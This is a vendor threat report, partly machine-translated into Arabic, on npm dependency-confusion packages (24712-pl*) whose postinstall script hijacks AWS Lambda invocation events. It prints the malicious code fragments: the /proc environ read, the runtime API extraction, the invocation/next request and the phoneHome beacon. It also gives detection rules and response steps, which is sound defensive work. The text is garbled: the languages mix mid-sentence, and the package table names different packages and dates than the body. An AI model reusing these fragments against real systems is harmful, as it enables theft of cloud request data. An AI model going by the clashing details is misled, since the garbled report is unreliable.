TL؛ DR
بين 6 مايو و7 مايو 2026، ناشر واحد لـ npm، pelavelle, pushed eight zero-dependency packages using names that followed the same internal-looking pattern: 24712-pl*.
The packages included 24712-pl3469, 24712-pl4712, 24712-pl5006, 24712-plv2و 24712-plv3. The numbered prefix strongly suggests an npm dependency confusion attack against an internal package namespace or package-id scheme.
All eight sibling packages were already unpublished from npm by the publisher between 2026-05-06T21:52Z و 2026-05-07T00:31Z. Direct registry metadata confirmed that the tarballs now return HTTP 404.
ومع ذلك، لا تزال المجموعة مهمة.
The canonical sample, 24712-pl5006:0.0.1، يحتوي على postinstall.js script that runs during npm install. Instead of stealing generic environment variables, it specifically looks for AWS_LAMBDA_RUNTIME_API, the environment variable used by AWS Lambda runtimes.
If the script finds AWS_LAMBDA_RUNTIME_API, it calls the Lambda Runtime API endpoint:
That call attempts to consume the next pending Lambda invocation event before the legitimate Lambda handler can process it.
The captured event, including headers, request ID, account context, and up to 8 KB of request body, is then sent to an attacker-controlled phone-home endpoint through the script’s phoneHome() وظيفة.
Xygeni’s Malware Early Warning (MEW) system classified the canonical sample as probably malicious with a score of 91.3/100.
We are tracking this as an npm dependency confusion attack with AWS Lambda runtime hijack behavior.
المجموعة: ثماني حزم، ناشر واحد
حساب الناشر pelavelle تم استخدام عنوان البريد الإلكتروني التالي:
pelavelle@clovercode.comThe account had an unverified email, no SCM verification, and a low reputation score of 5.
The publisher released eight related packages over a short window between 2026-05-06 20:45Z and 22:36Z. The package names all follow the same shape:
24712-pl*This pattern is the key signal. It does not look like a public developer utility. Instead, it looks like an internal package naming scheme.
| # | فئة الإشتراك | النسخة الخبيثة | تم الإنشاء، بالتوقيت العالمي المنسق | غير منشور، التوقيت العالمي المنسق | تم تأكيد الحمولة | خطاف التثبيت |
|---|---|---|---|---|---|---|
| 1 | مستكشف الكون | 1.1.3 | 2026-05-01T18:26Z | 2026-05-01T19:01Z | يُستنتج أن الناشر/المجموعة هما نفس الناشر | التثبيت المسبق، على الأرجح |
| 2 | signalsdk-web | 1.0.0 , 10.0.0 | 2026-05-04T13:57Z | 2026-05-04T18:51Z | استنتاج | التثبيت المسبق، على الأرجح |
| 3 | ms.analytics-web | 99.0.0 , 99.9.13 | 2026-05-04T18:47Z | 2026-05-05T10:07Z | استنتاج | التثبيت المسبق، على الأرجح |
| 4 | أيقونات.تم إنشاؤها | 99.9.13 | 2026-05-05T10:02Z | 2026-05-05T12:57Z | استنتاج | التثبيت المسبق، على الأرجح |
| 5 | تتبع زمن الاستجابة | 99.9.0 | 2026-05-05T11:57Z | 2026-05-05T12:57Z | استنتاج | التثبيت المسبق، على الأرجح |
| 6 | تتبع زمن الاستجابة الداخلي | تم حذف الإصدارات من سجل النظام | 2026-05-06T06:02Z | 2026-05-06T08:35Z | استنتاج | التثبيت المسبق، على الأرجح |
| 7 | تطبيق كاربونايت | 99.9.0 | 2026-05-06T05:49Z | 2026-05-06T08:35Z | نعم، تدفق رمز الماسح الضوئي بالكامل | التثبيت المسبق: node index.js |
| 8 | الكربونات-الداخلي | 99.9.0 | 2026-05-06T06:14Z | 2026-05-06T08:36Z | نعم، تدفق رمز الماسح الضوئي بالكامل | التثبيت المسبق: node index.js |
Total versions across the cluster: 19 version-package tuples.
The canonical sample, 24712-pl5006:0.0.1, was published on 2026-05-06T22:36:34Z and scanned by Xygeni’s MEW pipeline before the unpublish event.
It contained four files, including package/postinstall.js, with 3,335 bytes of total source.
الكنسي commit hash was:
83e0efbfd110abb2398a06196fb698565a3f6cc6Why the Name Pattern Matters
The package names are the strongest indicator of intent.
They all start with the same prefix:
24712-plThen they add numeric or version-like suffixes:
24712-pl3469
24712-pl4712
24712-pl4713
24712-pl5004
24712-pl5005
24712-pl5006
24712-plv2
24712-plv3This does not resemble normal public npm naming. It looks like an internal namespace prefix or internal package-id scheme.
That makes the cluster consistent with an npm dependency confusion attack.
In a dependency confusion attack, the attacker publishes a public package with a name that matches, or appears to match, an internal dependency. If the target’s package manager or build environment resolves the public package instead of the private one, attacker-controlled code runs inside the target environment.
OWASP describes dependency confusion as an attack vector that tricks package managers and proxies into fetching a malicious public package instead of the intended internal package of the same name.
For deeper context on how this class of attack works, see Xygeni’s guide on lack of version pinning and dependency confusion ومنشورنا على identifying and managing software dependency attacks.
ما يحدث أثناء التثبيت
The canonical package declares a postinstall صنارة صيد:
{
"scripts": {
"postinstall": "node postinstall.js || true"
}
}استخدم postinstall lifecycle is part of npm’s package script system. npm’s documentation explains that packages can define lifecycle scripts in package.json, including built-in installation lifecycle events.
استخدم || true أنه مهم.
It swallows errors so installation still succeeds even if the hijack fails. That helps the package avoid breaking the build and reduces the chance that developers or CI systems notice the malicious behavior through a failed install.
The payload runs during npm install. No developer import is required. No application path has to call the package.
The install itself is enough.
Payload Behavior: Lambda Runtime Hijack
استخدم postinstall.js script performs a targeted sequence.
First, it reads the parent process environment from Linux /proc:
const raw = fs.readFileSync(`/proc/${pid}/environ`, 'utf8');Then it extracts the AWS Lambda runtime endpoint:
const match = raw.match(/AWS_LAMBDA_RUNTIME_API=([^\0]+)/);If the runtime API is found, the script stores it:
runtimeApi = match[1];Next, it sends a first beacon through phoneHome():
await phoneHome({ step: 'waiting', runtimeApi, ts: ... });That first beacon leaks the Lambda runtime API endpoint.
Then the script parses the runtime API host and port:
const [host, portStr] = runtimeApi.split(':');Finally, it calls the AWS Lambda Runtime API path used to retrieve the next invocation:
http.request({
host,
port,
path: '/2018-06-01/runtime/invocation/next',
method: 'GET',
timeout: 90000
}, ...);That is the core of the attack.
The script attempts to consume the next Lambda invocation event before the legitimate Lambda handler can process it. AWS’s custom runtime guide also describes the “get an event” step as a call to the next invocation API.
What Gets Exfiltrated
If the script captures an invocation, it sends the result to the attacker-controlled phone-home endpoint.
The exfiltrated fields include:
| الحقل | معنى |
|---|---|
step |
Execution stage, such as waiting, next_error أو captured |
runtimeApi |
Lambda runtime API endpoint |
accountSid |
Captured AWS account context |
requestId |
Lambda invocation request ID |
isOwnAccount |
Boolean comparison against the script’s configured account value |
statusCode |
Runtime API response status |
headers |
Invocation response headers |
body |
Captured invocation body, sliced to 8,000 characters |
The key exfiltration call is the phoneHome(data) function, which JSON-encodes the data and sends it through an HTTP POST.
The exact phone-home destination URL was not preserved in the available truncated evidence. Therefore, npm should preserve the unpublished tarball internally so the C2 host literal can be extracted before deletion is finalized.
لماذا هذا خطير؟
This is not a generic npm beacon.
The payload is designed around AWS Lambda’s نموذج التنفيذ.
If a vulnerable package is installed inside a Lambda execution environment, such as during a deployment image build, a Lambda layer install, or an init wrapper process, the environment may expose AWS_LAMBDA_RUNTIME_API.
Once the script has that value, it can call:
/2018-06-01/runtime/invocation/nextThat endpoint returns the next pending invocation event.
As a result, the attacker may be able to capture:
- Request bodies
- رؤوس
- Request IDs
- AWS account context
- Signed request data
- معلومات تحديد الهوية الشخصية للعميل
- S3 event data
- Application-specific payloads
- Internal service context
The legitimate handler may never see the consumed event.
That turns an npm install script into a Lambda event interception primitive.
Even if the package never lands in a real Lambda environment, the behavior can still leak useful context from dev or CI systems. Reading /proc/<pid>/environ may expose environment variables present in parent processes, which can include AWS keys, database URLs, CI tokens, or deployment credentials.
This is why dependency scanning cannot stop at known CVEs. Teams also need malicious package detection, install-script analysis, and registry-policy enforcement. For related guidance, read لماذا يعد فحص التبعيات أمرًا مهمًا لفرق DevOps و الحماية من البرامج الضارة: لماذا لا تستطيع برامج مكافحة الفيروسات إيقاف هجمات سلسلة التوريد.
تصنيف Xygeni MEW
Xygeni MEW scanned the canonical sample 24712-pl5006:0.0.1 before the unpublish event.
The scanner returned:
91.3 / 100
probablyMalicious
threshold: 80The evidence included three Critical items and one High item confirming the Lambda runtime-hijack data flow.
| خطورة | دليل | معنى |
|---|---|---|
| حرج | /proc/<pid>/environ اقرأ |
Reads parent process environment |
| حرج | AWS_LAMBDA_RUNTIME_API استخلاص |
Targets Lambda runtime endpoint |
| حرج | /runtime/invocation/next طلب |
Attempts to consume a real Lambda invocation event |
| مرتفع | postinstall سيناريو |
Runs during npm install |
The behavior is highly specific and high impact. The package does not need broad malware features because the Lambda runtime endpoint is already a powerful target.
Xygeni MEW is designed for this kind of case: detecting suspicious and malicious package behavior before it becomes a downstream incident. For a wider view of current npm and PyPI threat patterns, see نظرة عن كثب على هجمات سلسلة توريد البرمجيات 2025.
لماذا يُعدّ نمط إلغاء النشر الذاتي مهماً؟
All eight packages were unpublished by the publisher within a short time window.
That behavior is suspicious in this context.
The cluster appeared, ran if selected by a vulnerable dependency-resolution path, and then disappeared. This is consistent with attacker cleanup after a successful or aborted proof of concept, or after the target organization noticed the issue.
Unpublishing creates a visibility gap for defenders.
Public npm data may no longer include the tarballs. Some package versions cannot be re-downloaded. However, affected environments may still have cached copies, lockfile references, CI logs, or package manager artifacts.
That is why registry-side preservation matters.
npm should preserve the unpublished tarballs internally long enough to extract the exact phone-home URL, confirm sibling payload identity, and support incident response.
مؤشرات الاختراق والكشف
الناشر والحساب
| الحقل | بعد التخفيض |
|---|---|
| اسم مستخدم npm | pelavelle |
| البريد الإلكتروني للناشر في npm | pelavelle@clovercode.com |
| تم التحقق من البريد الإلكتروني | لا |
| SCM التحقق | لا |
| Publisher reputation score | 5 |
| Package naming pattern | ^24712-pl[0-9a-z]+$ |
| Internal namespace prefix | 24712-pl |
أسماء الحزم المتأثرة
24712-pl3469
24712-pl4712
24712-pl4713
24712-pl5004
24712-pl5005
24712-pl5006
24712-plv2
24712-plv3Canonical Sample
| الحقل | بعد التخفيض |
|---|---|
| فئة الإشتراك | 24712-pl5006 |
| التجريبية | 0.0.1 |
| تم النشر | 2026-05-06T22:36:34Z |
| Commit مزيج | 83e0efbfd110abb2398a06196fb698565a3f6cc6 |
| Xygeni scan UUID | f80e4244-86d2-4a58-be59-7c56988a0f9f |
| العلامة | 91.3 / 100 |
| حكم | probablyMalicious |
خطاف التثبيت
{
"scripts": {
"postinstall": "node postinstall.js || true"
}
}Lambda Runtime Indicators
Exfiltrated Payload Fields
step
runtimeApi
accountSid
requestId
isOwnAccount
statusCode
headers
bodyThe body is sliced to 8,000 characters.
ملاحظات الكشف
Several rules can catch this npm dependency confusion attack and likely variants.
First, flag npm install scripts that read parent process environment from /proc:
/proc/<pid>/environThat is rarely legitimate behavior for an npm dependency during install.
Second, alert on package install scripts that reference:
AWS_LAMBDA_RUNTIME_APIThis environment variable should not be accessed by third-party npm packages during installation.
Third, block or review install scripts that call:
/2018-06-01/runtime/invocation/nextThis is the AWS Lambda Runtime API endpoint for receiving the next invocation. A dependency install script has no legitimate reason to consume it.
Fourth, hunt for lockfile references to the affected package names:
package-lock.json
yarn.lock
pnpm-lock.yaml
npm-shrinkwrap.jsonأي تطابق يستدعي مراجعة الارتباك في التبعية.
Fifth, alert on the package name regex:
^24712-pl[0-9a-z]+$especially when the publisher is public, low reputation, unverified, or outside the expected internal registry.
وأخيرا، أضف CI/CD guardrails around install scripts. This is especially important because npm lifecycle scripts can execute during package installation, before developers import anything. For more on CI/CD detection patterns, see Xygeni’s أهم 10 مؤشرات للاختراق في CI/CD Pipelines و الأمن والحماية Guardrails لـ CI/CD Pipelines.
إجراءات التسجيل المقترحة
This cluster was already unpublished at report time, but unpublish does not remove the risk.
الإجراءات الموصى بها من جانب npm:
- تأكد مما إذا كانت عمليات إلغاء النشر ناتجة عن عملية تنظيف بدأها المهاجم أم عن إجراء مشروع من جانب القائمين على الصيانة.
- تعليق أو حظر حساب الناشر
pelavelle. - إضافة
pelavelle@clovercode.com, the package names, and the package-name regex to npm abuse and supply-chain blocklists. - احتفظ بملفات tarball غير المنشورة في وحدة تخزين داخلية لأغراض التحليل الجنائي الرقمي.
- Extract the exact
phoneHome()destination URL from the preserved package tarballs. - Confirm whether all sibling packages share the same payload.
- Notify affected organizations if package download or install telemetry indicates exposure.
قائمة التحقق من الاستجابة للتسوية
If any affected package appeared in lockfiles, CI logs, package caches, Lambda layers, deployment images, or build artifacts, treat it as a potential dependency-confusion execution event.
الرد الموصى به:
- Identify where the package was installed: local workstation, CI runner, Lambda layer build, deployment image, or runtime environment.
- Preserve lockfiles, npm cache, build logs, deployment artifacts, and container image layers.
- Check whether installation occurred inside an environment where
AWS_LAMBDA_RUNTIME_APIتم تعيين. - Review outbound HTTP logs for unknown
phoneHome()destinations during the install window. - Audit Lambda invocation logs for dropped, missing, or anomalous events.
- Rotate secrets exposed to the install environment, especially AWS keys, CI tokens, deployment credentials, and database URLs.
- Review Lambda layers and deployment images for cached copies of the package.
- Enforce private registry pinning for internal package prefixes.
- Block public npm resolution for internal-looking package names.
- إضافة guardrails لـ
preinstall,installوpostinstallمخطوطات.
How Xygeni Helps Detect This Earlier
This campaign is exactly the type of case where security teams need more than traditional vulnerability scanning.
قد لا يكون هناك CVE. There may be no known vulnerable version. There may be no long-lived package to inspect after the publisher cleans up.
Instead, teams need real-time visibility into package behavior.
Xygeni helps by combining:
- Early malware detection across public registries.
- Suspicious dependency detection for dependency confusion and typosquatting.
- Install-script analysis for
preinstall,installوpostinstallالسلوكيات. - CI/CD guardrails to block risky packages before they reach build or deployment environments.
- Software supply chain visibility across dependencies, pipelineوالتحف.
- Policy enforcement for internal package names and untrusted public packages.
That matters because the impact of an npm dependency confusion attack is not limited to developer laptops. It can reach CI runners, build images, Lambda layers, deployment containers, and runtime-adjacent environments.
For broader AppSec and supply chain context, see تصميم المستقبل SCA:تأمين سلسلة توريد البرمجيات الخاصة بك و Software Supply Chain Security أتمتة.
ما يجب على المدافعين استخلاصه
This campaign shows how dependency confusion can move beyond basic proof-of-execution beacons.
The payload does not simply confirm that npm install ran. It attempts to interact with the AWS Lambda Runtime API and capture a real invocation event.
That is a meaningful escalation.
For teams using serverless, dependency resolution is part of the runtime threat model. A public npm package with an internal-looking name can become a path into Lambda execution context, request data, and cloud account metadata.
The core lesson is clear: internal package prefixes must be protected, scoped, and pinned to trusted registries. Install scripts must be treated as executable attack surface, especially in CI/CD, container builds, Lambda layers, and deployment pipelines.
CISA’s software supply chain guidance emphasizes the need to protect software, apply security checks, and respond to vulnerabilities continuously across the development process. In this case, that means treating package resolution, package scripts, and serverless build environments as first-class security controls.
تم الإبلاغ إلى npm بشأن تطبيق القوانين على مستوى الحساب، وقوائم الحظر، وحفظ ملفات tarball غير المنشورة.
